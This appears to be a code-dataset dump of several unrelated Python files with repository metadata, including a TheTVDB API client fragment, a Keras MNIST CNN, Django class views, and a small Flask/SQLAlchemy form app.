"""Cleans up strings returned by TheTVDB.com
Issues corrected:
- Replaces & with &
- Trailing whitespace
"""
data = data.replace(u"&", u"&")
data = data.strip()
return data
#end _cleanData
def _getSeries(self, series):
"""This searches TheTVDB.com for the series name,
If a custom_ui UI is configured, it uses this to select the correct
series. If not, and interactive == True, ConsoleUI is used, if not
BaseUI is used to select the first result.
"""
series = urllib.quote(series.encode("utf-8"))
self.log.debug("Searching for show %s" % series)
seriesEt = self._getetsrc(self.config['url_getSeries'] % (series))
allSeries = []
for series in seriesEt:
sn = series.find('SeriesName')
value = self._cleanData(sn.text)
cur_sid = series.find('id').text
self.log.debug('Found series %s (id: %s)' % (value, cur_sid))
allSeries.append( {'sid':cur_sid, 'name':value} )
#end for series
if len(allSeries) == 0:
self.log.debug('Series result returned zero')
raise tvdb_shownotfound("Show-name search returned zero results (cannot find show on TVDB)")
if self.config['custom_ui'] is not None:
self.log.debug("Using custom UI %s" % (repr(self.config['custom_ui'])))
ui = self.config['custom_ui'](config = self.config, log = self.log)
else:
if not self.config['interactive']:
self.log.debug('Auto-selecting first search result using BaseUI')
ui = BaseUI(config = self.config, log = self.log)
else:
self.log.debug('Interactivily selecting show using ConsoleUI')
ui = ConsoleUI(config = self.config, log = self.log)
#end if config['interactive]
#end if custom_ui != None
return ui.selectSeries(allSeries)
#end _getSeries
def _parseBanners(self, sid):
"""Parses banners XML, from
http://www.thetvdb.com/api/[APIKEY]/series/[SERIES ID]/banners.xml
Banners are retrieved using t['show name]['_banners'], for example:
>>> t = Tvdb(banners = True)
>>> t['scrubs']['_banners'].keys()
['fanart', 'poster', 'series', 'season']
>>> t['scrubs']['_banners']['poster']['680x1000']['35308']['_bannerpath']
'http://www.thetvdb.com/banners/posters/76156-2.jpg'
>>>
Any key starting with an underscore has been processed (not the raw
data from the XML)
This interface will be improved in future versions.
"""
self.log.debug('Getting season banners for %s' % (sid))
bannersEt = self._getetsrc( self.config['url_seriesBanner'] % (sid) )
banners = {}
for cur_banner in bannersEt.findall('Banner'):
bid = cur_banner.find('id').text
btype = cur_banner.find('BannerType')
btype2 = cur_banner.find('BannerType2')
if btype is None or btype2 is None:
continue
btype, btype2 = btype.text, btype2.text
if not btype in banners:
banners[btype] = {}
if not btype2 in banners[btype]:
banners[btype][btype2] = {}
if not bid in banners[btype][btype2]:
banners[btype][btype2][bid] = {}
self.log.debug("Banner: %s", bid)
for cur_element in cur_banner.getchildren():
tag = cur_element.tag.lower()
value = cur_element.text
if tag is None or value is None:
continue
tag, value = tag.lower(), value.lower()
self.log.debug("Banner info: %s = %s" % (tag, value))
banners[btype][btype2][bid][tag] = value
for k, v in banners[btype][btype2][bid].items():
if k.endswith("path"):
new_key = "_%s" % (k)
self.log.debug("Transforming %s to %s" % (k, new_key))
new_url = self.config['url_artworkPrefix'] % (v)
self.log.debug("New banner URL: %s" % (new_url))
banners[btype][btype2][bid][new_key] = new_url
self._setShowData(sid, "_banners", banners)
# Alternate tvdb_api's method for retrieving graphics URLs but returned as a list that preserves
# the user rating order highest rated to lowest rated
def ttvdb_parseBanners(self, sid):
"""Parses banners XML, from
http://www.thetvdb.com/api/[APIKEY]/series/[SERIES ID]/banners.xml
Banners are retrieved using t['show name]['_banners'], for example:
>>> t = Tvdb(banners = True)
>>> t['scrubs']['_banners'].keys()
['fanart', 'poster', 'series', 'season']
>>> t['scrubs']['_banners']['poster']['680x1000']['35308']['_bannerpath']
'http://www.thetvdb.com/banners/posters/76156-2.jpg'
>>>
Any key starting with an underscore has been processed (not the raw
data from the XML)
This interface will be improved in future versions.
Changed in this interface is that a list or URLs is created to preserve the user rating order from
top rated to lowest rated.
"""
self.log.debug('Getting season banners for %s' % (sid))
bannersEt = self._getetsrc( self.config['url_seriesBanner'] % (sid) )
banners = {}
bid_order = {'fanart': [], 'poster': [], 'series': [], 'season': []}
for cur_banner in bannersEt.findall('Banner'):
bid = cur_banner.find('id').text
btype = cur_banner.find('BannerType')
btype2 = cur_banner.find('BannerType2')
if btype is None or btype2 is None:
continue
btype, btype2 = btype.text, btype2.text
if not btype in banners:
banners[btype] = {}
if not btype2 in banners[btype]:
banners[btype][btype2] = {}
if not bid in banners[btype][btype2]:
banners[btype][btype2][bid] = {}
if btype in bid_order.keys():
if btype2 != u'blank':
bid_order[btype].append([bid, btype2])
self.log.debug("Banner: %s", bid)
for cur_element in cur_banner.getchildren():
tag = cur_element.tag.lower()
value = cur_element.text
if tag is None or value is None:
continue
tag, value = tag.lower(), value.lower()
self.log.debug("Banner info: %s = %s" % (tag, value))
banners[btype][btype2][bid][tag] = value
for k, v in banners[btype][btype2][bid].items():
if k.endswith("path"):
new_key = "_%s" % (k)
self.log.debug("Transforming %s to %s" % (k, new_key))
new_url = self.config['url_artworkPrefix'] % (v)
self.log.debug("New banner URL: %s" % (new_url))
banners[btype][btype2][bid][new_key] = new_url
graphics_in_order = {'fanart': [], 'poster': [], 'series': [], 'season': []}
for key in bid_order.keys():
for bid in bid_order[key]:
graphics_in_order[key].append(banners[key][bid[1]][bid[0]])
return graphics_in_order
# end ttvdb_parseBanners()
def _parseActors(self, sid):
"""Parsers actors XML, from
http://www.thetvdb.com/api/[APIKEY]/series/[SERIES ID]/actors.xml
Actors are retrieved using t['show name]['_actors'], for example:
>>> t = Tvdb(actors = True)
>>> actors = t['scrubs']['_actors']
>>> type(actors)
<class 'tvdb_api.Actors'>
>>> type(actors[0])
<class 'tvdb_api.Actor'>
>>> actors[0]
<Actor "Zach Braff">
>>> sorted(actors[0].keys())
['id', 'image', 'name', 'role', 'sortorder']
>>> actors[0]['name']
u'Zach Braff'
>>> actors[0]['image']
'http://www.thetvdb.com/banners/actors/43640.jpg'
Any key starting with an underscore has been processed (not the raw
data from the XML)
"""
self.log.debug("Getting actors for %s" % (sid))
actorsEt = self._getetsrc(self.config['url_actorsInfo'] % (sid))
cur_actors = Actors()
for curActorItem in actorsEt.findall("Actor"):
curActor = Actor()
for curInfo in curActorItem:
tag = curInfo.tag.lower()
value = curInfo.text
if value is not None:
if tag == "image":
value = self.config['url_artworkPrefix'] % (value)
else:
value = self._cleanData(value)
curActor[tag] = value
cur_actors.append(curActor)
self._setShowData(sid, '_actors', cur_actors)
def _getShowData(self, sid):
"""Takes a series ID, gets the epInfo URL and parses the TVDB
XML file into the shows dict in layout:
shows[series_id][season_number][episode_number]
"""
# Parse show information
self.log.debug('Getting all series data for %s' % (sid))
seriesInfoEt = self._getetsrc(self.config['url_seriesInfo'] % (sid))
for curInfo in seriesInfoEt.findall("Series")[0]:
tag = curInfo.tag.lower()
value = curInfo.text
if value is not None:
if tag in ['banner', 'fanart', 'poster']:
value = self.config['url_artworkPrefix'] % (value)
else:
value = self._cleanData(value)
self._setShowData(sid, tag, value)
self.log.debug("Got info: %s = %s" % (tag, value))
#end for series
# Parse banners
if self.config['banners_enabled']:
self._parseBanners(sid)
# Parse actors
if self.config['actors_enabled']:
self._parseActors(sid)
# Parse episode data
self.log.debug('Getting all episodes of %s' % (sid))
epsEt = self._getetsrc( self.config['url_epInfo'] % (sid) )
for cur_ep in epsEt.findall("Episode"):
seas_no = int(cur_ep.find('SeasonNumber').text)
ep_no = int(cur_ep.find('EpisodeNumber').text)
for cur_item in cur_ep.getchildren():
tag = cur_item.tag.lower()
value = cur_item.text
if value is not None:
if tag == 'filename':
value = self.config['url_artworkPrefix'] % (value)
else:
value = self._cleanData(value)
self._setItem(sid, seas_no, ep_no, tag, value)
#end for cur_ep
#end _geEps
def _nameToSid(self, name):
"""Takes show name, returns the correct series ID (if the show has
already been grabbed), or grabs all episodes and returns
the correct SID.
"""
if name in self.corrections:
self.log.debug('Correcting %s to %s' % (name, self.corrections[name]) )
sid = self.corrections[name]
else:
self.log.debug('Getting show %s' % (name))
selected_series = self._getSeries( name )
sname, sid = selected_series['name'], selected_series['sid']
self.log.debug('Got %s, sid %s' % (sname, sid))
self.corrections[name] = sid
self._getShowData(sid)
#end if name in self.corrections
return sid
#end _nameToSid
def __getitem__(self, key):
"""Handles tvdb_instance['seriesname'] calls.
The dict index should be the show id
"""
if isinstance(key, (int, long)):
# Item is integer, treat as show id
if key not in self.shows:
self._getShowData(key)
return self.shows[key]
key = key.lower() # make key lower case
sid = self._nameToSid(key)
self.log.debug('Got series id %s' % (sid))
return self.shows[sid]
#end __getitem__
def __repr__(self):
return str(self.shows)
#end __repr__
#end Tvdb
def main():
"""Simple example of using tvdb_api - it just
grabs an episode name interactively.
"""
tvdb_instance = Tvdb(interactive=True, debug=True, cache=False)
print tvdb_instance['Lost']['seriesname']
print tvdb_instance['Lost'][1][4]['episodename']
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
7c9050279a3de4691a1bb15a38d626d1f8517c3e | 6d6ad8fca4051e5b4e46bef431878059bac9161c | /howtouseMCP.py | 88ec0503dfbf6fec198e37921c812fdae93fda4c | [] | no_license | weichen0407/MCP-Digit-Recognition | 340b71e2542afcb7612bcb2a2134872afc4873a9 | d0b250e7c6b3384e5f7b9f9939f1c192a8d10880 | refs/heads/main | 2023-08-15T12:36:19.795385 | 2021-09-27T20:43:37 | 2021-09-27T20:43:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,347 | py | import numpy as np
import mcp.py
# First create the model with the desired inputs and outputs (inputs, outputs)
mcpModel = mcp.MCP(784, 10)
# Then use the MCP's getData function with a csv file to get the data as a matrix and labels as an array
traindata, trainlabs = mcpModel.getData('train.csv')
# If used for training, reshape into an array of size (numinstances x numoutputs)
trainlabels = mcpModel.reshapeLabels(trainlabs)
# Use getData function to separate file into data and labels
testdata, testlabels = mcpModel.getData('test.csv')
# Use the train function with testing data and reshaped labels
mcpModel.train(traindata, trainlabels)
# Predict function does one instance at a time, so use a for loop to iterate through all the testing instances
# and calculate accuracy based off of that
testaccuracy = 0
n = testdata.shape[0]
for testIndex in range(n):
# use predict with one instance of data at a time
result = mcpModel.predict(testdata[testIndex])
actual = testlabels[testIndex]
# Compare the actual label and the predicted label, if equal increment the count by 1
if (result == actual):
testaccuracy+=1
# Get the total accuracy after testing
finalaccuracy = (testaccuracy / n) * 100.0
# Just to display accuracy
print("Accuracy of Multi-Class Perceptron is approximately {}%".format(finalaccuracy)) | [
"[email protected]"
] | |
754705493d33379d2a6b30e114411413ba153370 | 0d2cd2a19d37a4edbda53d9b22fefe726fa06457 | /while_list_indexes.py | ebb0808b61234444afa4cdc8acd38261c7ce5419 | [] | no_license | gkalidas/python-django-bundle | 22ab9b1cc798f6d995385e7959acf2057cd6ad01 | 66df9604d6b87d6398afca2127e70d8d11c8b95c | refs/heads/master | 2023-03-15T10:02:23.495413 | 2020-08-12T16:55:05 | 2020-08-12T16:55:05 | 266,520,942 | 0 | 0 | null | 2021-03-25T23:56:47 | 2020-05-24T10:50:14 | Python | UTF-8 | Python | false | false | 208 | py | # while with list and indexes
ex_list = ['one', 'two', 'three', 'four']
counter = 0
max_index = len(ex_list) - 1
while counter <= max_index:
number = ex_list[counter]
print(number)
counter += 1
| [
"[email protected]"
] | |
e7e2e35e74f6f746945d6189c17e6e7c5bf68ec4 | 4c852fab792606580acb3f3a61b7f86ae25930b0 | /Python/MIT-CompThinking/MITx600.1x/ProblemSets/wk3/L5PROBLEM5.py | 5fc93127f17702a2607600df981bd5e7b2f929a5 | [] | no_license | hmchen47/Programming | a9767a78a35c0844a1366391f48b205ff1588591 | 9637e586eee5c3c751c96bfc5bc1d098ea5b331c | refs/heads/master | 2022-05-01T01:57:46.573136 | 2021-08-09T04:29:40 | 2021-08-09T04:29:40 | 118,053,509 | 2 | 1 | null | 2021-09-20T19:54:02 | 2018-01-19T00:06:04 | Python | UTF-8 | Python | false | false | 259 | py | #!/usr/bin/python
# _*_ coding = UTF-8 _*_
def gcdRecur(a, b):
'''
a, b: positive integers
returns: a positive integer, the greatest common divisor of a & b.
'''
if b == 0:
return a
else:
return gcdRecur(b, a % b) | [
"[email protected]"
] | |
5a7cf3eb0101279de44ad43c46ab42689bd0eb5e | 8d6fb31cd96632d02db88663ea0a2112103033ce | /chaper7_compile_to_c/run.py | 76688b919787e0b0416a76253310c6c695f7c7a0 | [] | no_license | CodevilWang/high_perf_python | d75182732fed84b53f02f14d64b931ed0d1c001a | 000672c006f3fd5604b45a7857d72e55003fc30e | refs/heads/master | 2021-09-15T18:50:26.986311 | 2018-06-08T13:23:53 | 2018-06-08T13:23:53 | 114,531,549 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 86 | py | #!/usr/bin/env python
import sys
def calculate_z_serialize_purepython(maxiter, zs, cs) | [
"[email protected]"
] | |
275aa3e362920aae1e2af84fe0380f36fa448f39 | 55c250525bd7198ac905b1f2f86d16a44f73e03a | /Python/pygame/pygameweb/pygameweb/db.py | 57c70ca70133b811d4447037d0df7cd54b72e632 | [
"BSD-2-Clause"
] | permissive | NateWeiler/Resources | 213d18ba86f7cc9d845741b8571b9e2c2c6be916 | bd4a8a82a3e83a381c97d19e5df42cbababfc66c | refs/heads/master | 2023-09-03T17:50:31.937137 | 2023-08-28T23:50:57 | 2023-08-28T23:50:57 | 267,368,545 | 2 | 1 | null | 2022-09-08T15:20:18 | 2020-05-27T16:18:17 | null | UTF-8 | Python | false | false | 129 | py | version https://git-lfs.github.com/spec/v1
oid sha256:95c026dc0e7051336cd999158979e81f159d4470489660469d0e0175c66400da
size 1274
| [
"[email protected]"
] | |
ec81f69f8b35b27ca38c0fabe125ba6ef4bc3a1d | 1975ee674b36084366b1bbe2c091d8f0f8795dc0 | /demo/class_views.py | 49ac0086b684256a0215318d23d4992296ad6f5e | [] | no_license | srikanthpragada/PYTHON_03_JULY_2018_WEBDEMO | f193213788deadcab7ac7b183328269ba1334488 | 56e076ad30703117cafc56d6d95449c6ec8eebb2 | refs/heads/master | 2020-03-25T11:45:53.128704 | 2018-08-23T15:29:05 | 2018-08-23T15:29:05 | 143,747,408 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 877 | py | from django.views.generic import TemplateView, ListView
from django.shortcuts import render
from .forms import LoginForm
from .models import Course
class ClassView1(TemplateView):
template_name = 'class_view1.html'
class LoginView(TemplateView):
template_name = 'login.html'
def get(self, request):
form = LoginForm()
return render(request, self.template_name, {'form': form})
def post(self, request):
form = LoginForm(request.POST)
if form.is_valid():
print(form.cleaned_data['username'], form.cleaned_data['password'])
return render(request, self.template_name, {'form': form})
# Generic View - ListView demo
class ListCourseView(ListView):
model = Course
template_name = "courses.html" # default is demo/course_list.html
context_object_name = 'courses' # default is object_list
| [
"[email protected]"
] | |
0fae2317ff82c61b45f4af1f32caf571d43b7215 | a23139a3a1de7427843c5216e2abc90cced88487 | /video_learn/03_keras_mnist.py | 32bf1d15fbaf25ea10d614a0c50a9b84df6f4f12 | [] | no_license | shxiangyan/Document | 7aeb3e07665662fa67179de4484d20c138256205 | 10352279b8696bbd934adb7ffdb63e0c017b8adb | refs/heads/master | 2021-02-07T01:04:58.884043 | 2020-04-27T14:48:13 | 2020-04-27T14:48:13 | 253,468,956 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,969 | py | import numpy as np
from keras.datasets import mnist
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import Dropout
from keras.layers import Flatten
from keras.layers.convolutional import Conv2D
from keras.layers.convolutional import MaxPooling2D
# 先读入数据
(X_train, y_train), (X_test, y_test) = mnist.load_data("../test_data_home")
# 看一下数据集的样子
print(X_train[0].shape)
print(y_train[0])
# 下面把训练集中的手写黑白字体变成标准的四维张量形式,即(样本数量,长,宽,1)
# 并把像素值变成浮点格式
X_train = X_train.reshape(X_train.shape[0], 28, 28, 1).astype('float32')
X_test = X_test.reshape(X_test.shape[0], 28, 28, 1).astype('float32')
# 由于每个像素值都介于0到255,所以这里统一除以255,把像素值控制在0-1范围
X_train /= 255
X_test /= 255
# 由于输入层需要10个节点,所以最好把目标数字0-9做成One Hot编码的形式
def tran_y(y):
y_ohe = np.zeros(10)
y_ohe[y] = 1
return y_ohe
# 把标签用One Hot编码重新表示一下
y_train_ohe = np.array([tran_y(y_train[i]) for i in range(len(y_train))])
y_test_ohe = np.array([tran_y(y_test[i]) for i in range(len(y_test))])
# 搭建卷积神经网络
model = Sequential()
# 添加一层卷积层,构造64个过滤器,每个过滤器覆盖范围是3*3*1
# 过滤器步长为1,图像四周补一圈0,并用relu进行非线性变化
model.add(Conv2D(filters=64, kernel_size=(3, 3), strides=(1, 1), padding='same',
input_shape=(28, 28, 1), activation='relu'))
# 添加一层最大池化层
model.add(MaxPooling2D(pool_size=(2, 2)))
# 设立Dropout层,Dropout的概率为0.5
model.add(Dropout(0.5))
# 重复构造,搭建深度网络
model.add(Conv2D(128, kernel_size=(3, 3), strides=(1, 1), padding='same',
activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.5))
model.add(Conv2D(256, kernel_size=(3, 3), strides=(1, 1), padding='same',
activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.5))
# 把当前层节点展平
model.add(Flatten())
# 构造全连接层神经网络层
model.add(Dense(128, activation='relu'))
model.add(Dense(64, activation='relu'))
model.add(Dense(32, activation='relu'))
model.add(Dense(10, activation='softmax'))
# 定义损失函数,一般来说分类问题的损失函数都选择采用交叉熵
model.compile(loss='categorical_crossentropy', optimizer='adagrad', metrics=['accuracy'])
# 放入批量样本,进行训练
model.fit(X_train, y_train_ohe, validation_data=(X_test, y_test_ohe)
, epochs=20, batch_size=128)
# 在测试集上评价模型的准确率
# verbose : 进度表示方式。0表示不显示数据,1表示显示进度条
scores = model.evaluate(X_test, y_test_ohe, verbose=0)
| [
"[email protected]"
] | |
8b04ac74aeadb6ba21d5c623f12f988aaa3af34c | bbfb3856386b7bbb0ec47e02d8be3f9764b8523a | /app.py | e104743f47838b66f9a0d73687f3f6529bd99019 | [] | no_license | tonnysilas/sqlpractice | 67f2fbb1e9c2074fbd59acd04e904c0955989bda | 12cce4da59cac4f86aa226da5f731ac9b7cd6986 | refs/heads/main | 2023-04-28T21:13:38.881594 | 2021-05-31T09:40:04 | 2021-05-31T09:40:04 | 372,434,016 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,888 | py | from enum import unique
from flask import Flask
import os
from flask import render_template
from flask_sqlalchemy import SQLAlchemy
from flask import request
app = Flask(__name__)
project_dir = os.path.dirname(os.path.abspath(__file__)) #finding the current app path. (Location of this file)
database_file = "sqlite:///{}".format(os.path.join(project_dir, "formdatabase.db")) # creating a database file (formdatabase.db) in the above found path.
app.config["SQLALCHEMY_DATABASE_URI"] = database_file # connecting the database file (formdatabase.db) to the sqlalchemy dependency.
db = SQLAlchemy(app) # connecting this app.py file to the sqlalchemy
@app.before_first_request
def create_table():
db.create_all()
class Book(db.Model): #creating a model for the cell called title in the form
title = db.Column(db.String(80), unique = True, nullable = False, primary_key = True) #this means that the cell will only accept 80 string characters at max without repeating any. It can not be empty and is a mandatory field
def __repr__(self):
return "<Title: {}>".format(self.title)
@app.route('/', methods=["GET", "POST"])
def home():
# validating the content of the form. This condition shall be false if the request.form list is empty
if request.form:
title_from_form = request.form.get('title') # assigns the content of the title field to the variable
book = Book(title=title_from_form) # instance of the Book class. assigned to the 'book' variable
db.session.add(book) # adds the data to the session
db.session.commit() # this commits the data to the database
books = Book.query.all() # this retrieves all the contents of the book table.
return render_template('form.html', iwe = books) # rendering the html page alongside the queried books to the browser.
if __name__=="__main__":
app.run(debug=True)
| [
"[email protected]"
] |
Subsets and Splits